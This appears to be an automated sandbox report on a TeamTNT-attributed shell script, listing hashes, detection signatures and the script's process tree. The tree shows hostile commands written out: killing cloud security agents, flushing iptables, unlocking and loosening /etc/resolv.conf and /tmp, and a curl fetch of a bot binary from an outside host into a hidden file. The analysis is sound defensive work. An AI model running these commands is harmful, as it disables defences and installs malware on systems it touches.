Overview

overview

10

Static

static

10

SugarLogic...AWS.sh

ubuntu-18.04-amd64

6

SugarLogic...AWS.sh

debian-9-armhf

6

SugarLogic...AWS.sh

debian-9-mips

6

SugarLogic...AWS.sh

debian-9-mipsel

6

SugarLogic...nge.sh

ubuntu-18.04-amd64

6

SugarLogic...nge.sh

debian-9-armhf

6

SugarLogic...nge.sh

debian-9-mips

6

SugarLogic...nge.sh

debian-9-mipsel

6

SugarLogic...tup.sh

windows7-x64

3

SugarLogic...tup.sh

windows10-2004-x64

3

SugarLogic...bot.sh

windows7-x64

3

SugarLogic...bot.sh

windows10-2004-x64

3

SugarLogic...d_2.sh

ubuntu-18.04-amd64

7

SugarLogic...d_2.sh

debian-9-armhf

7

SugarLogic...d_2.sh

debian-9-mips

7

SugarLogic...d_2.sh

debian-9-mipsel

7

SugarLogic...oit.sh

windows7-x64

3

SugarLogic...oit.sh

windows10-2004-x64

3

SugarLogic...arch64

ubuntu-18.04-amd64

SugarLogic...arch64

debian-9-armhf

SugarLogic...arch64

debian-9-mips

SugarLogic...arch64

debian-9-mipsel

SugarLogic...x86_64

ubuntu-22.04-amd64

10

SugarLogic.../bot_u

ubuntu-22.04-amd64

10

SugarLogic...en2.sh

ubuntu-18.04-amd64

3

SugarLogic...en2.sh

debian-9-armhf

4

SugarLogic...en2.sh

debian-9-mips

3

SugarLogic...en2.sh

debian-9-mipsel

3

SugarLogic...cap.so

ubuntu-22.04-amd64

1

SugarLogic.../mo.sh

ubuntu-18.04-amd64

7

SugarLogic.../mo.sh

debian-9-armhf

7

SugarLogic.../mo.sh

debian-9-mips

10

Analysis

  • max time kernel
    149s
  • max time network
    132s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    29-12-2024 23:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh

  • Size

    33KB

  • MD5

    dd89ab7314e13989bdcae176a82078ac

  • SHA1

    9ed46a6dde1dc1de4eed8185c1d622a5fc97092c

  • SHA256

    1b72088fc6d780da95465f80ab26ba094d89232ff30a41b1b0113c355cfffa57

  • SHA512

    e56722b308702bec178a1eca47c400af2435b57b190a10307aec0eebdfd4ef04ec6d63302a754b508a62d64668cb7b4edbc596a4e40c409e34b4934265d7db3d

  • SSDEEP

    768:DBxlT2wDGWvWCrDN+FylT4hxXpGdKI3oB6RXrsdrCIZMfXxK2eJ5tLW:qWN+Fyl1dRoGrq9W

Score
7/10
defense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Flushes firewall rules 1 TTPs 2 IoCs

    Flushes/ disables firewall rules inside the Linux kernel.

    defense_evasion
  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Attempts to change immutable files 3 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 2 IoCs
    discovery
  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
    "/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh"
    1⤵
    • Writes DNS configuration
    PID:1477
    • /bin/hostname
      hostname
      2⤵
        PID:1478
      • /bin/grep
        grep -i "[a]liyun"
        2⤵
          PID:1480
        • /bin/ps
          ps aux
          2⤵
          • Reads CPU attributes
          • Process Discovery
          • Reads runtime system information
          PID:1479
        • /bin/grep
          grep -i "[y]unjing"
          2⤵
            PID:1482
          • /bin/ps
            ps aux
            2⤵
            • Reads CPU attributes
            • Process Discovery
            • Reads runtime system information
            PID:1481
          • /sbin/iptables
            iptables -F
            2⤵
            • Flushes firewall rules
            PID:1483
          • /usr/bin/chattr
            chattr -ia /etc/resolv.conf
            2⤵
            • Attempts to change immutable files
            PID:1489
          • /usr/bin/chattr
            chattr +i /etc/resolv.conf
            2⤵
            • Attempts to change immutable files
            PID:1490
          • /usr/bin/chattr
            chattr -ia / /tmp/ /var/ /var/tmp/
            2⤵
            • Attempts to change immutable files
            PID:1491
          • /bin/chmod
            chmod 1777 /tmp/ /var/ /var/tmp/
            2⤵
            • File and Directory Permissions Modification
            PID:1492
          • /sbin/iptables
            iptables -F
            2⤵
            • Flushes firewall rules
            PID:1493
          • /usr/bin/curl
            curl -sLk http://chimaera.cc/bin/KBot/x86_64 -o /tmp/.kube
            2⤵
              PID:1494

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads